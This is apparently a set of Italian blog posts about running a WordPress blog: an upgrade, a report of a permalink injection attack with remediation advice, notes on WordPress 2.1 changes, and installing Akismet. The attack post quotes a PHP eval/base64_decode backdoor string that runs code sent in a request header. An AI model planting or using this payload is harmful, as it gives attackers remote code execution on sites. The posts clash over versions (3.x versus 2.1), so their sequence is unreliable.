Ultimamente Domenico mi aveva segnalato dei problemi con il feed di questo blog. Ne ho approfittato per aggiornare alla nuova versione di WordPress (la 3.x) e dare una bella ripulita ai plugin qui in uso.

Il team di sviluppo ha introdotto un bel pò di novità sulle quali sarà il caso di documentarsi.

Del tutto per sbaglio, mi sono reso conto solo oggi che il mio blog ha subito un attacco di tipo MySQL injection via XMLRPC. Non avendo accesso ai log di sistema, non posso capire a quando risalga questo attacco, credo comunque al più ricada negli ultimi 3 giorni.

Mi ha insospettito l’aver incollato il link al mio ultimo post nel mio status Facebook. Ho, infatti, notato che il link presentava, nella sua parte finale, la seguente stringa:

%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

Cercando maggiori informazioni su Google, ho riscontrato che da ieri sono tantissimi i blog su piattaforma WordPress sotto attacco.

Tipo di Attacco: Non è ancora chiaro come funzioni, ma pare che varie versioni di WordPress siano attaccabili tramite questo exploit che consente agli utenti (non admin) di editare la struttura dei permalink del sito iniettando del codice PHP tramite una chiamata XML-RPC.

Soluzione: si deve modificare le opzioni della struttura dei propri permalink, dal pannello di controllo di wordpress ed, eventualmente, eliminare gli utenti admin registratisi (nel mio caso, però, non ho riscontrato la presenza di ulteriori admin).

Si vocifera da un paio di giorni che domani verrà rilasciata la nuova versione di WordPress (prima major release dopo la 2.0). Personalmente non effettuerò l’upgrade immediatamente per tutta una serie di ragioni, non ultima il non avere la compatibilità con i plugin in uso su questa piattaforma e la scarsa affidabilità iniziale, soprattutto a livello di sicurezza, delle prime release di nuovi branch di qualsivoglia applicazione.

Girogavando per la rete ho poi trovato questo interessante articolo, dove vengono elencati dieci differenti punti da tenere in considerazione per un eventuale aggiornamento alla 2.1:

1. E’ stata aggiunta una nuova funzionalità di auto-save dei draft scritti: sfrutta AJAX e prevede come vincolo l’aver inserito il titolo del post;
2. E’ stata migliorata la sezione per l’upload delle immagini;
3. Sono state apportate tutta una serie di modifiche alla gestione del database. Nello specifico sono state modificate alcune tabelle del db su cui si appoggia wordpress ed è stato aggiornato il metodo per interrogare il database:
• $tableposts è diventata $wpdb->posts
• $tablecomments è diventata $wpdb->comments
4. Per quanto detto al punto precedente, non tutti i plugin funzionanti per la versione 2.0 è garantito funzioneranno anche nella 2.1. E’ possibile trovare qui una lista di compatibilità;
5. E’ stata introdotta la funzionalità di migrazione del blog verso altri blog o altre piattaforme. Potete leggere qui maggiori informazioni a riguardo;
6. E’ stato eliminato il supporto a versioni di MySql antecedenti la 4.0;
7. E’ stata aggiunta una nuova interfaccia grafica per la scrittura dei post;
8. E’ stato effettuato un merge, a livello di database, del concetto di link e categoria;
9. Nella versione 2.1 si dà la possibilità di decidere il livello di privacy del proprio blog tramite degli appositi filtri che consentiranno di bloccare i motori di ricerca o qualsivoglia altro tipo di directory;
10. E’ stato ripreso l’utilizzo, introdotto nella 2.0.3, dei nonces: sono delle password inserite nelle email di moderazione dei commenti che permettono ad una specifica persona, e solo a quella, di effettuare quella specifica operazione in wp-admin

Credo che ci siano dei buoni motivi per installare la nuova versione (ad esempio la nuova interfaccia grafica, e sicuramente qualche altra piccola opzione corretta qui e lì). Ma, credo anche alla luce degli ultimi avvenimenti (leggi rilascio a distanza di pochi giorni della 2.0.6 e della 2.0.7), che ci siano ottimi motivi per non effettuare l’upgrade: su tutti, l’aver tolto il supporto a versioni di MySql antecedenti la 4.0 e il non aver a tuttoggi il completo supporto su tutti i plugin.

(via technorail)

Erano mesi che passavo le ore a controllare i commenti su questo blog per cancellare tutto lo spam che mi arrivava. Finalmente mi son deciso ad installare un anti-spam e la scelta non poteva che ricadere su akismet.

Il funzionamento di Akismet è assolutamente trasparente: una volta ricevuto un commento il plugin in questione lo trasmette ai server di Akismet, dove viene controllato da alcuni filtri antispam. Nel caso in cui il commento venga identificato come "spam" verrà memorizzato in una zona particolare, detta "Akismet spam". Da qui sarà possibile recuperare un commento "buono" (la possibilità di errore esiste, sebbene minima) o cancellarlo definitivamente.

(via giovy’s blog)

ps: un problema che ho riscontrato è che, non facendo un filtro a monte, i commenti di spam occupano comunque dello spazio sul database mysql